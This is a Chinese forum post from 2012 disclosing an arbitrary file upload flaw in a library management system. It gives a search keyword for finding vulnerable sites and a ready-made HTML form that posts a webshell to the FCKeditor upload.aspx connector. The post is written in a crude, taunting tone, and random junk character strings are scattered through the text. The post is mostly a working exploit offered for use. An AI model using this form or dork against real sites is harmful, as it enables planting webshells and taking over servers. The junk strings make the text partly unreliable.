主题:图书馆系统任意文件上传漏洞
' W0 E* Z/ {# B: d' F1 U 作者:冰锋刺客) c7 f/ X: p3 F" _+ }
厂商:点击书(dianjishu.com)
) p* H) |, @! t5 b- l y 日期:2012-6-21
; i/ }$ h8 t* B% O1 I ! k8 _8 q1 f4 I7 g( N, \0 g! u) ?, \( N
I 概述! j9 D# u) I: Q0 B# y
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell+ w( I; r7 S; b' O/ C
II 简介
2 y3 B. d: f% W 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
2 Q+ r; E3 V9 B" R# G3 i 补充一个漏洞
, A, x- N$ I. T% y5 C" I <form id="frmUpload" enctype="multipart/form-data"
6 r" G+ A2 E4 r0 H; i) [+ I action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
& j4 G2 j/ H4 S E k2 f8 }1 _ <input id="btnUpload" type="submit" value="操翻他">
* i3 C7 g$ K; L \0 f) D; S/ c </form>% b% k# y; F4 c' S7 M
你们懂的% x1 Z x. A6 Z5 z9 R! x( i
那傻逼提供还需要改包.
9 _; B0 K3 }7 B5 k3 N4 P 自己看了下源代码发现fckeditor
, v/ f7 E2 K8 L# e9 t 直接秒杀; {( q5 ^ }# X# ?; }4 \* B5 Z
|
发表于 2012-9-10 21:20:59
收藏
支持
反对